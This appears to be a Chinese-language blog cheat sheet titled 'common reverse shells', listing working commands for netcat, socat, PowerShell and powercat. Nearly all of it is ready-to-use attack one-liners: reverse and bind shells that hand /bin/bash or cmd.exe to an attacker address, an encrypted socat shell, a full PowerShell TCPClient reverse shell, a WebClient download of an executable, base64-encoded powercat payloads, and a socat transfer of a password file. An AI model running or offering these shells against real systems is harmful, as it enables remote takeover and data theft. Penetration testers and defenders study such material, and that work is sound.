常見的幾種反彈shell(整理中)
阿新 • • 發佈:2020-12-07
目錄
netcat
# 當作telnet埠指紋探測
nc -nv x.x.x.x 110
# 檔案下載
# 服務端
nc -nlvp 4444 > tmp.exe
# 客戶端
nc -nv x.x.x.x 4444 < tmp.exe
# 正向shell
# 目標
nc -nlvp 4444 -e cmd.exe
# 本機
nc -nv x.x.x.x 4444
# 反向shell
# 本機
nc -nlvp 4444
# 目標
nc -nv x.x.x.x 4444 -e /bin/bash
socat
# 檔案傳輸 # 服務端 socat TCP4-LISTEN:443,fork file:secret_passwords.txt # 客戶端 socat TCP4:x.x.x.x:443 file:received_secret_passwords.txt,create # 反向shell # 本機 socat -d -d TCP4-LISTEN:443 STDOUT # 目標 socat TCP4:x.x.x.x:443 EXEC:/bin/bash # 加密 正向shell openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36 2 -out bind_shell.crt cat bind_shell.key bind_shell.crt > bind_shell.pem # 本機 socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin /bash socat - OPENSSL:x.x.x.x:443,verify=0
powershell
# 允許執行powershell程式碼 Set-ExecutionPolicy Unrestricted Get-ExecutionPolicy # 下載檔案 powershell -c "(new-object System.Net.WebClient).DownloadFile('http://x.x.x.x/t.exe','C:\Users\user\Desktop\t.exe')" # 反向shell powershell -c "$client = New-Object System.Net.Sockets.TCPClient('x.x.x.x',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII ).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c lient.Close()" # 正向shell powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $byt es.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
powercat
# 載入 . .\powercat.ps1 # 執行 powercat powercat -h # 下載檔案 powercat -c x.x.x.x -p 443 -i C:\Users\user\powercat.ps1 # 反向shell # 方法一: powercat -c x.x.x.x -p 443 -e cmd.exe # 方法二: powercat -c x.x.x.x -p 443 -e cmd.exe -g > reverseshell.ps1 ./reverseshell.ps1 # base64加密 powercat -c x.x.x.x -p 443 -e cmd.exe -ge > reverseshell. ps1 powershell.exe -E ZgB1...(reverseshell. ps1中base64加密內容) # 正向shell powercat -l -p 443 -e cmd.exe